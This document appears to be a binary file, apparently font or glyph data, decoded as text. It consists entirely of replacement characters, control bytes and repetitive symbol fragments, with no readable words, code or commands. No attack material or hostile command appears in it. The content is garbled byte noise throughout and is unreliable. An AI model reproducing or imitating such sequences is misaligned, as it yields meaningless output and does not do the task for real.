������������������������������������� �  �!�!!�"�""�#�##�$�$$�%�%%�&�&&�'�''�(�((�)�))�*�**�+�++�,�,,�-�--�.�..�/�//�0�00�1�11�2�22�3�33�4�44�5�55�6�66�7�77�8�88�9�99�:�::�;�;;�<�<<�=�==�>�>>�?�??�@�@@�A�AA�B�BB�C�CC�D�DD�E�EE�F�FF�G�GG�H�HH�I�II�J�JJ�K�KK�L�LL�M�MM�N�NN�O�OO�P�PP�Q�QQ�R�RR�S�SS�T�TT�U�UU�V�VV�W�WW�X�XX�Y�YY�Z�ZZ�[�[[�\�\\�]�]]�^�^^�_�__�`�``�a�aa�b�bb�c�cc�d�dd�e�ee�f�ff�g�gg�h�hh�i�ii�j�jj�k�kk�l�ll�m�mm�n�nn�o�oo�p�pp�q�qq�r�rr�s�ss�t�tt�u�uu�v�vv�w�ww�x�xx�y�yy�z�zz�{�{{�|�|�}�}|�~�~}��~�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	�	�
�
	��
���
�
��
����������������������������������� � �!�! �"�"!�#�#"�$�$#�%�%$�&�&%�'�'&�(�('�)�)(�*�*)�+�+*�,�,+�-�-,�.�.-�t�
��l��L����,�"#�'�(�)�>h@�B�E�G\H4KLN�StTxU�V�X�Zt\�`�a`h�pDrHs�t�xH{T|P�����p�x�x�<�$���l�`�H�d���(������X�8�t�4��������lð�����̀д�������ݠ߬��T���l�����@�����$���|�h< 	d���#�&�(�+l0�4�8�;<=@8C�D�JK\L�N�Q8S�VW�]�_pc�edh�o�s t�w�~�������|�L�l�0�����P����P����<�t���l�l���������l�����T������8����8� �Lː���0Ψ�,�8���,������4���0�����\�0h�P
lTD��<X�$�'�**�,9|;�<,?�AB�E,IJ�L�M�O�Q,RXS�UdWXX@Z\�]�_\bc�f8hiTk`n�oXs vx�{�}~�x���h�p�\�����������@���@�D�H���������0�8��`����������xŸ����ʄ�x�\ΐЄќ��0�\؀� �$����x�X���dxlph��
D4���Pp�#�$8%X&&�'�(�*0*�+<,\.@/t1�2�4t6�7�9pPQ|STT�U�W8X0[\lyty�z�|�}T}����l���<�����������h�|�p�H�x��(���h�8���d�������x�$�T�<�t�������<�����p�(�������\Ŝ�8���Ш�LԘ���������������x����T���X����h��������!#$((8+�-X.�/�1p2�5�6�7�9;L>@hC�E�K�M�T(VY�^_p`da@b0c8c�efDgxh�i�j�k�l�m�n�pq`r�t uvTw|x�zz�{�|�}���l��������$�T��������T���� �T�l����������P���|�����8�������������<���������<�D�X���\�L� �������(�h�������������Là���,ǤȬɨʈ�|̀�$ͤ����Tј��l�\�����L�<���ހ�ߘ����p�����,���H���<���� �`�p�,�|���$�����t���t��Xh��@�$��	T	�	�
(
d
�8�x

H
|
�
�x�4l(�`�`�P��$\���X!\(h/X6L=(@�C�G\J�L0MtN�O�PHP�P�Q4Q�Q�RRXR�S�T TtUU\U�U�VHV�V�W<W�X�Y`ZZ�[�\d]$]�^�_P``�a�bdcc0cPcpc�c�c�dd0d�e8e�f<g0h(ijj�k@k�lhl�l�mmHmtm�sDtDu�wTxy<z@��P�����x�D�T���,�����$�,�8�������������|��� ������� �@À���ǸȰ�������L�<����Ԅ���ؤِڤۤܔݤިߴ�����H�<��������P����������������x	,
x<�
�X�t|�`H���P �"X"�$�%�&|'h(�)p*L+<,�2(5H6�7�89�:�<�?�A�BxD(E�H�JLa�c|dPeTf4g�j8kpmm�n�p�qds�v�x|���p���������8�|���t�l�����������D�����p�������P�l�������@ĔǼ���ʤ�X�8μ�p����۠�(�|�$�$�p�$�����l��� ���
�
�(Tx�%�&`(�,�.�1p2�4l5�8<:|;�<�?d@lB�D�HLJ�LxN�P�S�VV�Z�\]�`da4e\g�i�l�n�r�tTwH���8�l�������l��� �h���d�l�p�(���(�h�p���t���p�0������H�����$�����,�@ĠŴ�lȈ�ɤ��,̸ͼ�tδ�Lϐ�����8�x��<����T�4����D�L�<�����l$,
�
T `�� $!X!�"�#�$�%�(H)�+�,�66�8�:�;�=\>L?�A�B�E|F`H�J\LhNR(S�U�VpXY�Z�\�]^�_l``�bTe�ii�kxn�oppdp�q�r�s�t8v,w�x�zd{h|�}p~t\�����4�����p����������T�����������4���,����L���<���d�������������<���p�4���|�(�����<�\�4�������`�������������X�����P�d����������P����\��D���`�Ќ�\Ѽӌ�(���@�����h�x����l������8�����@�X���	�	�	�	
�	�	h	�	�	%�	&�	0�	;�	<�	>�	@X	C�	G	Jd	Q�	Y�	]�	_�	b	g\	m�	q�	vd	zh	~H	��	��	��	�H	��	��	��	� 	��	�\	�	��	��	� 	��	��	�H	�<	�(	��	�	�	��	��	��	�`	Ä	�	�	Ƥ	�D	�	�4	��	�L	��	�P	�\	�L	��	��	Ѽ	�`	�0	�	�<	ۤ	�<	��	�p	�0	�	�	�L	�H	�L	��	�(	�	�	�	�X	�(	��	��	��	��	�|	�l	�@	��	��	�(
�

d
�
�
x
�
�
�
	
	�

�
4
�

�
`
�
�
 
�
H
�

 
�
H
�
�

�
x
l
�
�
 �
$@
%�
'�
(�
)�
*�
,d
,�
-�
0�
0�
1�
2�
3T
4x
5�
6H
70
7�
8�
:�
;|
@@
B
E
E�
F
G�
Hl
I�
J�
K
K�
L�
N�
O�
P�
Q
Q�
R�
ST
T$
U
U�
V 
V�
W 
Wx
X 
X�
Zt
\�
]4
^
_
_H
e�
gL
h�
j�
k�
k�
l�
n4
o�
rd
u�
vd
x
y
 
��
��
��
�x
��
�
��
�H
��
��
�h
�
�0
��
��
��
�
�d
�(
��
�`
�t
��
�0
��
��
�8
��
Ƥ
�,
��
�
�
�0
�0
�
�l
ڸ
�@
�
�
��
�8
�
��
�(
�
� 
� 
�����4	
 ��D|��8x �!X"x#�$�&�)�+t+�-4.h/p0`1@2$3$3�5�8p9`:�<0=�?L@�E�GHH IdJ<K<K�LHM0N OO�Q�R�TT�U�W|XDY�[�\�]8_�a�c�d�e�gh8h�i�lDm0m�o�q�s\thv�xdz{H|}�t�4����� �t�D������,���\���X�T�t�h���p���������������4���@�������P������\�l�L���lˌ���`���4��ڈ݄�<�,���\���\���@� �X�`���(�T���
0\���x@$ �"p$X(*<+�07>H$L�R�X�a�j�rPx8�l�t�4���D�p���h��������������P���������X��Ƅȴ� �����,���ټ����d�����������h�|��X�x���p�����T���\�t
�
4
@
 
�
�
d
�
�


|
T
�
�
�

L

�
�
x
 �
!t
#t
#�
&
&�
(
)�
+�
,\
-(
.
/(
04
1h
2
2�
2�
3�
4
4�
6
7
7�
8�
9l
9�
:L
:�
;�
<$
<�
>l
@
A�
B�
C�
D�
E�
G(
H
H�
JH
J�
L�
M
N
N�
O\
P 
P�
R�
T�
Ux
Vd
W�
X�
Y�
Z�
[�
]P
^�
_�
`�
a�
c
c�
d<
e�
f�
g�
h�
i�
r,
s8
s�
tT
v<
v�
w�
xD
xx
zL
{
{�
|
|�
}
}�
�
��
�0
��
��
��
��
�0
��
�4
�T
��
��
��
�8
��
��
� 
��
��
��
�\
��
�P
��
��
�
�|
�|
�@
�$
��
��
�h
��
�d
�L
�x
�
�p
�x
�$
��
�
��
��
��
��
��
�D
��
�8
��
��
�,
��
�8
�X
��
��
�
��
�
�d
�H
��
��
��
ð
ĸ
�
��
ɀ
˼
�
δ
�T
�
��
��
��
ؘ
٘
�
��
�T
߄
�
�$
�
��
�l
��
�p
��
�,
�\
�@
��
�<
�
�
�L
��
�<
�P
�
��
�l
�\
�(80��|	X
$
�L��@�HP�d�H|����!�"�$h$�&'�)�*x,T,�-�.�0|4X56X7,8�9�;;�<�=,=�>�?�@�A`B�K�L�M�NdO O�P�RS�T�V�WtW�X�Z Z�[P\d\�]�^�`Ha�b�d<g|h�i�j�k4k�lhl�m|n0oho�s0s�tuLvv�w�x�{@|@}�������\���|�����t�p���l�����$��@���`�L�H��h���d������� ��L�,����x� ���d�@�$���D�h�X������@���8�`�|����� ��l3���8kw�676767'.;2767'&232767'&67676367676'./&'&+'&'&76'467676.'.#"?6>?67>36&/&767676676/&7>&/.?>?676&'&'&?676%2"&>'"&462'.?67654&>76&'&'&/&6?67676&=6&/&?676?67675.'&#"76&6.�
	$	4$%2'

�	0	
 (S

!1JJ
	 )%!
	1%
; 	
"

&"*		8��"�$x!	"+
�
	?6


%�			�
�	l	0	
_
 0L�r9b
Ln4#	%!+3E

%!!	
0
	
		
	
	8o�
!/ ��80%#.*#�	
%		
Q		
%.R	
		���#,>KXr��2"&46'462"&7264&"7462"&7264&"016'&'&4>2".72>4."/&763276'&7&/&6767676&76'&'`  ,!!�'6&&6'$$02E11E2$3#$2$		
	�P'CPC'(CNC( 8@7  6A8 �
����2A]<�� ?	�Ʃ�	/;"?���x�q	� . !- ''6''$�#11E22"$$2$$�-
�'D''DND((C(!7! 8B7  8��
3T2A�)qV,		?	�S
+��nGl~���"/&6767627676&'&/&'&/&'&'&7676?6%"'&/&4767676'&'4'&'6767#''&'&?76/&6?6?&'&'&74?2=	-Sr<��4N*-^"q
�h+	96?,
cC-$
GZ<'! 3�(%<!(�
P�(KWq!",T{:�0	 P&)L
�z		
e�
	/.7.lB-(9uf�\8.H4&.$4L*&?ZG.8/S%/1((I+$����&#"'&'&'&#"6767632"'&'76767757475767676?;277'&/&/&'&'7767&''"'&'76326?67676.+"'46;2v%T~'%%'~T%:&!/&. !94*%	,%.'"-		cD	
	

	
	Dc 
""*"'.%+%+39! .%0 &	�� �QQ$K)L4.
	=
		'
 &+"#Bc30-

-!,
	AcBM$4""
' 
	
<	
.-&J� ����5E{��54&+"#54&#57>/&"#54&+";4?6+"&=46;#"#54&#57>/&#54&+"32654?6=.+"&=46732'3#"&=4."+3546;23546723546;2C
1	hw		1

)�*h	
�0
hw	1
*�
)
^
	�$F080
I'D
)HF,D
˃

##
0";�
""�)�I�)�@
R
##
0";�	""

�)�7�)�
�n@
-��V00V{#

"�-
"h"


���!6<l������67676763!&'#'&'.'&'&'&%373&'&#"67627!276767676;&'&#*"'&'&'&'&+"'&/&'&'#367676?6;63675#&"&4627"#'&/&0136776763;67"'&'&/&'&#!67#""&4627"&>2�
D@XJT.	
4B!6.,-)/0R:2<52�1@10&;bevH�76AV5~i�32v��$-(7C!+
8A @�+�,<2<=F8)'(I./0?!--(+3&-:$CL)RY'`�-)9:P98�'*
(kl
@J
!ID;5 )/;S�
��-!*hs*L0N(�K']
�
-	,?.-",IU�1
a9:,(��B "�! 
 	(#'! #	"	

	#
.x9P99P9&GE
1 3"$Q @!
		Z@BX{''(���
(6DRj'762%'&"7"'.5462762762'&"2?6'&"2?6%'&"2?6"'.'&'27>=C5:�4;K�vcf�fcu���b��~5
55
57��'w({�ucf�fcv�RVEKCLO��G2TT2�
	���e�	�****-ccbb8****��K3s2TT2s3K����>GKT% &'.>27676 &'&'&763276323276?>4&"26%'%4&"26�
8���91ma�am1$$5��5$

$"�YY�,.
�g9GGG6�	/66.

))
b��
-55-
1		��

�"kkkk"���!8bo276764'&'&"632".5472>4.#""&'%276764'&'&#"632"'&'&547'?"/*&&��B?&&&&?B�E&2;>i>>i|i=C&@L@&&@&-$13I3��=:9ac�d`9::9`dtwd%UafWV2332VW�WU23/wI���2�CPLB?L&&?B�B?&&*&>i|i>>i>:3C&@&&@L@&.3I42$�fvtda8;;8ad�d`9:=&/32UW�WV2332VWfaU�J�1����
s�����%".4>2'2>4."';#'6767&/&'&'&'672767&'.'&>76767.'2?63'&'&'&&'.?>323/&'&7.>&>74&26'3''&'&/P..O\O/,O�#9D9#";D9"�$jm#2%A!		
""&(9<&) [1$ 	'#oN
	E$;1!#*%-!�(/0))? '5
�'5'&5'&42I65(9()8(�:P

',-O^O.-N.0P.�!:"":D;!";�$

	.
)
+	
�1V%1	�'(4&'��3K33J5Y()8'(�P%

�96i����456767676+"&'&'&'&+'"'&/:7>76=&'&'&'&'&7326767>32'#"'&'.+'&'&=&767676;2767>;66'54&'&'&".67676'.67676?4=Lo�K:F=
1	j�
	.;N'S1x$H#$		i��w+%##I$H656
|P>KA.6";- A=
+9/
$0EUxeA+%
_
KQ"&#.'
 0\��
		C
�0"9xl+H *s:1, 
/, L)+A	0,#51	
3@!'


#
G!	1(M
	�	


�������45&7462?>6?>767>'&'&'&'&76764'&'.>267>/&676767>/&>7673>5&732>54.#">2'.�"
	!	
			/
&
 
((8P�YQL�_


,(	"/-
 	
�=g<@k>>h<?j>d$<%!9!%?% 7 �
>	V	<	J
&, ,--2<Va(K�/2,
	
&
K&
I
V
%��>i><j@<h><h@%;!%<D<!#9�p�E%'&'&'&'5276574&#'&'&7577"?676�(-4@��70)("B@92,+A8P�pk�69\ChSO	�M7A*zf/):>%2!'	
�)N+-o||||=6(D*-���	l;/��\2F'&'&'6'46>76'&'&476?>.7&76767>\d[}TT�<	�x3%G1P7bC,&K
q�		��."7YU/
 7'�nd
$C�5DAl7
T>3ABaC+Z;_fVW	S�7+89iL)'\++* );@
���2GYt�����%#"'&'&547>762"27>764'.'&7&#&'&'&'&7676''&'&'&327>7654'&'&"'&'&'&7>7&'"7676&76767676'&'&?673676"3276764'.'&�,1Yf0Y=	7* 8k


+1+V(1-Y*#+-�$"N

	!*/,,1-B1,Y.
8!+;
��*2X�O(A;+-T=D*S�'*!(
(!q

-%
0	
��+.[���7:?B�>".'#'&'.'&767676727676%73/%7""'&#"&'&&&'1&'&'&'&'&'7>3:27>7>76�			'&53X 4'8.%k�,4.F<3+#UPLr��rZ���8��jbx

0	!!	
+

P?	
5


'K�)�#jMK2
���d@!	yTW����{c����	
	

Co**
?,/��1ap���!54'&'&76'5>7376'"265&'&'&/&'&'43636?6767>276?6&5&7436275&'&'&"'&'&=&74636%&'&7546362456;2#""&56'��^X-A62D!
?*	=)
@0'2?
D(

G8U!0! �	/, ."��5<X�B!!B17B	
'9
	+J		?4	2��lr02""MK! �-<�\ #D N
���%5D�>'&/.7676.727676.&"327676&7676'&'&"&'&'&'&'&/.6>&'&'&376?�	
S-
p-	
&	4U
#	�8
504
	.r?X(SL�{��#
59
=	
B"Q	
$!!
# ��F"	

		! %%*<	�H�K�y�����+6^gp7&'/&76?&&76767>7676326'&'&+'.7>7676766?6&/&'.7654''76'4&&6762656'&'&117676#&"&7676'.'&#"+&"&7>676765&'&'&'.%636767>'&/&76.#"&'.6762#7>7#"&'&6322654&#"67.&/..#"'.72"&>264&"�


		Z,	"TY?1<4*
	!,%9
	*

	)%C9r

"\]
.5 
5H#5/EV

>H<


$=<	'	AK	
)	&+
	e 2Zh


	�	



j 	


		OYY



 Ue
	(G.
 	


, pk



(9Z_(%	
	

�
"			
=
� D

��%#u


�*	
���� >6767>'"/$'&676&'&'&6767676'&�	
	!�e8N"bO�


���JU8`. 6	

&
(-
z(Aga:Z8��pvY�Y�?)26-�

	$$)7����%K'&'&767676&76'&'&'767>/%&'.7>�' ' +�{%$
ZVN*)�t


?��
 ) .��
6)'K���<(#"E�vB
$&h>!!�a-,
p$ "	*	
$ A#65nm'"M#%1��������	%7H[q��YU|��:K]w������*E������1U������%&'.65%&76'5&'&'&'&'&/&'"&637'.&=&6&#"'&/&'&'&'&#"/#1?67376?6?67>3633767>76'47?6767676'3>6?65'&"&466&'&'&?6'&/&767&/67&/4'&/.767&'&'&/&707/&/'0'#'&5&''&'.'&/4&6'&5'&5454272#'.'&'.'5&6767676756'#"#"'.76'&476766=&'&56+&322'#"&5&7>37265.'&56'&"?6&+'&676#"'.767>76'&76?6?6327'#"'&'&5&'&/&'&5&7676?654'&'&5467676363276'&'&/.'&/&3>76?632+">'&'&767>'&'.'&'&/&?676766576?>72675>/.'&'&'&7'&'476?6?67676?6?"'&'&/&5&?67>76?67&'&/&'&54&'&'&'&75474626?6765&/&/2&/&'./&'&'&'&'&'46?26754'&'&/&/&'&/.?'6?46&'&5#'.'&757?6/&/&'&'&'&?'&/2'&/&/&/&'&/&'5&/&&'&/'>4&&767&%7'67676576?6?6>?4&/&'.676?577&'&'&767>77&'&56767676&6727672654/&'.7>76&#'&'&#"3#"372?6767'&64'.?2.676'6&5&75&76'.'""432?676.327676.'#&4?663>'6'&/&?676/&'&76754'&/&&#'&'&"36?7674/?64%&'&'54/&75&5?676?6&/'&'&/&546''6&/&76?6?6546?>'4?#&'474&5'&71&6?'&/"'&'4?67/&/&5'

�"!@

"
	&
				-
	

"
�!
:
0	3
#	$	

/
	� 0
5

"
		"

		
	


1	I


		







	
%	"
3#	%




+

	
		
"
"
	
o
s

	z(
" 
		

%
�$
1


($231
		 e	


��

,!		�

9
		
			-2�{


			
	�r	
	

	
:	�

		

%
@


{		
S
'-	A	



	
 


					"
	
	:0

)	+ "	�2�i$
#a 
	
!�	


<4	
:*8
B

'���	
0
	

			
	

	
&
	
!#&.<0

%
"&%0!"

	

	
"$  		
	
	

,
	B+





� 	) 2			
*#�
-		(	',HK
)
$ %)9&5#H1%/H,%D.($	 '
$(+%
]., +/
	
	#0)$@�>	'

	

_#!

+=O$
N!s


��"�1
		
3,�	
2
!5


/

J6?)
		

$	��
	)
�		
	

�


�x,		

N+L&	("'
7,'	2	
		
,�3 	
l("
	
s			

G�Ux�&/&'&76?>'&'&+&&'676'6767&'"#6767&>767'.7262>74&767>76&&'&'&'&'&'&7>.76./&"&#'&'&'5&676767636767&6'�
WLXT\C&2L7?:($1.WC\��
IuG++9O	

%
\	4)#1
$U�^�0/$$
+0
	J 		O9++]Gf3$/*
,/,$��%�Yl�

)+%
		

'B
I�Y[3C

		(%


;G7Le�U��A 6*
%-

	D4\@]�T�i:	���|�7&'&'7'&'!'&'&76767&'&6767?676'&6'&1?%2'&'767&'&'.7.''.6?6765&&'&667'&'&�0?ACHL@E=*[)9M�2' >#	
	�
40:�@2=BY,1(3:#65:O
)" 6);
�f1

w,*		
� 452
	)^9:%>ď>2A�:/6�K
"			= '1M
5'(;/��a3�O93�d3&<
	
����,5AJ��,%767#"&'#2?;265?6??6'"264&/6."7"264&'&'76&/.&/.+"'&!7>=4&/+"/&'/.?'&/"&=4376?'&?626?46;27622/+"&5'&'/&?&/&=43767'&?626?46;2762&"7>4�	WVdVW	,A9%	[		%9A�d"�hZ�!�?
(A2"!\!"2A'>??
�p			

		
			
	�hZ�+44+<D/LL/D2$#�^ m�$#(4D)
AA
(D5)_`							
		
|^m	!��,+Vz&'&6;2"&544&"3!26'&'.#!"&46;6767&'&'#"&463!2+32'&'&'&/&4?676767!�*
�		*		 		P'@	
'P(
��

.99.	

/

.99.	j!&&!�d!&&!�?@		@?$$t*JT	TJ*�� ggBVVBgg" ggBVVBggA@59"77"95@AA@59"77"95@A��@(G#&#&'&'&5<'467676?273!2>54'&'&'&'&'"!"�NBd.$
+@W	f8P@
*:�(=-8*>��2@{X'9VhSL5�5	
	
i�F_Vw`�


��[RiF
�����	&#&#"&5&'&6767>&"'&'.=6'.'&"'&/&"#"32676762676'54676767>/.767636276%6232'&'&=#"''&'67&''&'&6;&547#"&767>67'&'&676766325467>+''"32654.&&7676�	-3

-ARV@10F3
!CR'#UB/01	��
4

%"+08/)#	PN
#,2
4(!.		"�11->0&>	)%mSC

-1 B2@RUC

!2C 20,/?V		0+%"
KP
#) -41+

OM"/	$+W1:0>-0A,++		��(5ir}�������%>&'#676&/&'&37676767676%23?63>?4367676&'&5676'.%2&4662"'&''&4762'2.>6?6?&/&'&'&'&'&&#&/&>&'37>.%32654&'#&7"254&7#3=4&>54&#"&7"#">7547>=4&�	��	


	�|��
>#)

:R,B4? +,>-,2	

M+.>+,�
V+65j
�5(N(	
��/
~
	x
5


�"*Uj	
�?�ON9 $*B$-5N	;�+?,,?,�
	�->,,?,�{	,6&fD)	!�	
	
	�k�Q��
#�&'&'./7'7767636366?>372?4?46?657227676/636=476767676/&7676?6?>/&'&756?6767676575&'&'&76763632"'&/&#&#"'&5476?67676;67'&'&'&7>767632&'54'4'&/.'"&'."&5'&##""'.##'.&#"&=./"''&/&/&'&'&336367676376?>?6'�	SxF3�`B4/M6G#	
	
	
		



�#+'*'
$

	|	
	'�% ;#	
	;
	
	

6	
	

) ,
*H6mi "
)4T	;?
 %			'	





	/
"�

)	
	
	
		
E�
-
	�D
		1
		






		�<9LX7676767>=4&#"&46;2+"3!26?>#!"&%3!26?#!"3!264&vA9]
>
�	=G
	1#5�2g
)-
���)�I/)p
l
�(od�	�

#!����#9Qu6&'&'.?67676>.'&#"'&?67637'&56716'&67676767676767>=0(�Me<z9:;F%=5j2H23F2�1.	HV
%2(A0]);-	#;t�




@8&.	��9A'L#8^q8]H��$22H33(MH#	%2'��C)90

TI	%L	}

/3=8	���3AD3!"/&"/&'!267&/&"27%625&"762'10�^A����Ag���N
�K��/^"#��$�v������"�#�x;0%��:�$Ht��tt�����%.'&'.67>'.7>'.7>76&'&7>767676.'&676'..'&676&'.676?2737>'.>.>36'.7676�"r5jV
W|m!,%R	
+#1$0S(/3z,O
ZDQPYO\
;% @/
9	 7!(b$	3c
	];#%
 h5%7	F*!+
F 
,/sU�	p E3#.>[;92f8	
,#7	504e(HiEj "(/b*J2+"A
	
$%FH
#KO"OI+nm*
RW&1,
	2D#,50	
)K(3 
P9��K�%454'#&'&'&75656=4'#&'&'&767&5'&?6&'&'&'&''&'&'&'&5676&'&/&'.74?�O=K $DoD>M!
&Dx'1$L&	FcDA+G=O5BZ )1,	&G(<6�/9E>G&*M3
2>G<C**6:dI21:5<6<0I2JFPI6.P?;I*%+

$8G$ #*1KW5)>x>
��Sp�����%#&"&56454&#'"#&#&5467326=&76&'#"+"&463626&75467636232##"&5474&7632'#"&54'4637245&6372'""&7%4546;2+"&5.62/'676?7�	

fh	
'6�32
.(ff(-	I	?~	
/�	S('	�L	((5	��R,->-,!"B 



!=Y,	
"�!

"�#
*8		#)0.(4

)R/fk6�m		5kPP	��
V,+�O+?-,>,�00[[��y������������ 2CQ]h67676'54/&'&676&'./&'76767626=47676?>&/&'667676765676327>776327&'>%&?67672&566&&76716&'&6&746&7676"&'&63%/&'4650#&'&'&76?6.'&632%&'&>72"&762'&'&/.7637'&/&7>/&'&>#"&'&6476&�


"$=(	
	
*

("	
	$,
'" '04-(	
 #		<�� I21E 
'		�
58=EN	4.�1
+��"

7)8��* %

�%11�3*Q	�
!�
	%!2%X(
	
I4

 
(!"'
":


%

$


xt�
w/8o0&H�	�
5
,B;1 ;�6/]*7y)
�
.'z	�-&#	��)B
&
Q

	%��	�x'+���	'!	!'!7!'����������K�B����E�sД}�>�h�y���g�jt�������~���ξ����A�q&627>'&'./.>326/&/.>#&'&767676?>'.#'&#'&'&'&7>237>'&/./&'.&/./&'&'&'&/&'.'.'&2?6?6>?6?6?6767626?67676?676267676?4?6547676762>&/./&'&632>'&/"/"/.767676767654&#>&'&'.'&/&'.6;>&'"'&'&/&'&676'4&=6?6?>.&'&76?676&&'&57657&'"&/&/&'&/&'&676?67>76?6767676&�(

(

'

					


			
		 

!"	 

�

#




	
	
		k
.
0&H




	

	#	

(
4		


#	|
	



"
	


	
	

"

	�




	
			




	

	


�/
	


	


		
$

#		
&

"

		
	�




	



	

		



	�
'	$#	
a
"+#	
			
	

		����%6775''/''''&'''''''''&5>7&'76?'7'01'7'6?'6?'7'7&'6?'7'67'7#'7'7#7'7'7&/'''''''#'''"&/'''#&#6?#77#7'6?#7'67#7777777775'''''''''''###'#&'#'&'&''&/&&'5&''&''#/&''''&'&'''4#'#3&''&/'&'&''''''''''#'01'''77373#'&#/'''''''''#'#7777777777777777376?37>?>?3676'27&'&'&'6?33777777777''5777'#7'77#5'577'''''""'673''7'7'7''72/'7'7'7'7'7&'7'7'7'7� 




	*/M !

		
+
				(

	



	

		

'
			
	+


	!!M1)$	
)1'		

		

	
	9@ 







"?8	
	

	
	
	
'1)
!
$�		


	

	5N	

< #	

	
	$&TJQP("!
	!	  !!#
33
!! 		!	
!"(PQGW&
$	
		



$!<
M4		
			
	
					



,	
"#
	,



					
	
		����0���6'6767676=&'16?676?67&'&'4'&'&/&/&'&'&'&7&'&'&'&="'&'&/&'&7&'76767676'4462"&7264&"�$7:?0-*3.';+N%B.
��
"%8
a+$D,		%o@/,+
0,="!		5	O
�1D21E1,!!'J-0A()
#"3.; 2	
	-
#��%!) !+
*/E2"AP$!4.; 4


,4|;# .,\B&/77kG	3JBq"11D11"!�6�&'&'&'&'&''&'&'4'&76/4&+"'&'&'&'#"#'&'&'&/0676767676767>567>7635�!!!

	
 %- (!

'
)),	C'*	



)'%(-1	
,"

%����(5>N"!.#"27676=>4.462"&".4>2"&462"2?>'&#2K��L0&@&*#30RU�UR03!)'A��""�#>$$=I=$$=j!�	D	E�<..<%@MD�_SO.00.OS_�DM@%��"�y/O^P//P^O/p!!z	EE����9DTco}������������	&73676767654'&%"727>76767>'&'&7>'&7276&'.26754&'.%6'&2>5'4'&%&7>&76'.65'4.6%>&'&676?4'.%6'&'7567%6'&'%6'&'?67?%>'&'032654'%2/&'i';

8%&V
	��mg	%'>16

 :
�

	��		�
 ���
	��	�	��	�
��J
t�
��
:
�����X,E$+(!4
O1,%
K$Ij%'?9:#(=5`2	
@	
j" n	n
$!%

�
"
�%!
9
	
&yV>
/`

0Q*U	
5X

��������'&'.7>>767'&&'&'&'&'&''.7>&'+'.76'&'&'&'&'.6767676?676767676?676'&7>?>'.'&6&'&'&#&7>"#?>.#'23>'&'&67676x




,#)7+'

	B0
* ('%8
	40/
	



"?-!*�
	
'

0"	�
f
	V""
-,
!A		

		

	&
	
�


 
($8

*%8)J	
& 
 &3WU@911#3	
<. 
!'!*z	#



��
^*
	
��"09M%&'&/&>'&7&'&'"&56767&'&354462&667654'&'.�{�*Z#++
	%ZEc["5A�]<
���=��M'

=֧%O2��K
��gB3�U3	xOp
hn�)O�u
	I�����&'&'&/&'&/&'./&/&'&/.7657476?67636=4/&#'#'#'"'.'&/&'./&/.'&'&/&'&'&/#76?67>7676767675263=�

*


	

+	


			

@$
	
	 
(#




,-



	 



$	
	



4

�o276?6'&/376?6'&/'&/&/4#"1#"+'&'"'&#'&4?67'.756''.?6'#'&'&4?6767'&/&63767##&'&'&'5&637'&'&'&'&'56764/&767626767676>'&'&'&67676?676223.767/&"'&�9;WCA2(9Q		0356	

			

-




$	#@,
'!)(%	kA*	206:
9#		
	
%"*'6B!

�%
	
		
c8)+
-%0%		
 

%

	
	


-
8%+
	+/@;!
	

*'E'	8

�

��!Aa&'.?6763256.7&'.73636256'.%."5.37676256�Sk59&>{`>z]$Qj�I^_$6mT7lRH]
1A 2A@%J:
%J85G-S=V=<kJ�.?)I5K613/A5 -	 +
2$4%#�12>'&476.'&'&'.6767676��g

L@
@L
2JopSANB>Je  
.L 
!L-!	"1P! K*��:=IMZ01&76'&#'"'&&'&'.'.367&'.323>>77>'&/7#&>'&6&#"'&5476?6?67367671;6'&6?676'&4637>'&767>'&'&76?67>'&67>/&'&6762&'&&>&#676'47.67?676'&'&/3'>76'#&'5076'.#�

 *2$#N, 85UN
.-

:		
		

	
!



 		>
&


!	
$	


)&!
&�
�

.



	y	
(			}
U"$ 	
3A/U	

"
		
	
/	'

	C		
'<< G




	


		< 
#E)&

	�	�		h





	�
	����#3FVev����67&'&'&'&"2767.#"3'&767632#"'&%67676764&"#"326=&'&#"&546;2";2>=4&#"&54632%"2>4.#"32>54&"&51656;2� 
	 =TsA .3V3Y	*!x 	

 �q(4W4%!/0
	�AsTw3W3/5!)	��#�q%4W4(r	
0/�><+%
	'->��
^C;\3. k3V3�!
0!-$c@>-'	

%+<>��(4W4%Gg�/"	* !4\;C]3V3k /�1$-!0
Fw�xFFw�wE��gG&4W4(� *	"/���&'&'&54'&/7676?>&&"'&'&/&&'&'&'&'&'.76?37>7676?6767326526'6/76'2367>7676?>76757>7676'47654'.'./7676?6767>�G!6+7#
'#($+6!G'						

		

		
	
				o
",-8467	9
"

6	#	&	



#3#D3#
	

&	#	7����5676767676?6?67>3?6764'&7676'&&'&##&#'.76&#'&767167676/&76'.74&'&'#"'&76'&'&/&'&'&7654/&''.=4'&76'&76/&?6565'&&6&'>&4%!$"#

)K	

$&	&$	
	
H-

*#
"



	



	
�	/

"

(	N3
3
.L8)
(-'	

 "	
	
1$.O/


+	G		

+ 7!7

������#)4Q_h���2">7'&''&'4'6767677676'676?676776767767&'&'&'&767'76767'76767'76?>&'&'&'.76?'.75676?676767676?676767676??63676?6767>76/&'&'&'&'&'&/26/&'&'&1#&7676732767'&'6/&/6/&'&"7>7>7#&'7"'&'&'767676&7676776764/6"'&676?>'&&?'&'76?27676?2?65.7677677676#"&6>67&'7&'&"#"7'&'7&'67#'&'6''&/676'&7736&17#63727676&/&7&"&/&'
O:	
	

!>fj-%


(	
$By	
*%,4+1%
2%
	23	/

"&
	S"&02)(��0+
4'	&

* 
0!	  
	
	

!!,(
0&#	%'
#		!'%

	

  $ ($v
*		�� �	��57'%
2'!	d	U-�

	





��
"6W

<N72G%K2[ $(87=8&i$	
 "":>
	"&
$*)		
	
		
*G
		%��	
	
 3+4
	



			

$			!
	
	



		


&1+/4
-
		
	��
q���
�
]*,	J

	"
		
�����%.76'&/'"&?6767676'54/&'&'&/1'&6767676?6'&72516&'&'&?676/4&'#'.767676=476'4/.'&'&'&/.'&&7676767672766?6?67676�
	

$	+
		

	
8!		9 %


 
 ,(D0A(�$.$	T+
)	3 
!
	$0
(&6 +h#e8	T

!:E# 


		4,
(
'9)&
�k�%&'&'&'767654/&676?676'./&'&#"/&'&"&'&'&'&'"'.'&67676767>.76?67676732;7376'46767673276'&�(.(!
%	
	0
	$'&"$D	(6.%E^($ $(JK'/&{H*4
7)!
.^/
	��	z	& 
	"	*/C/#*J7>6&
%	'!
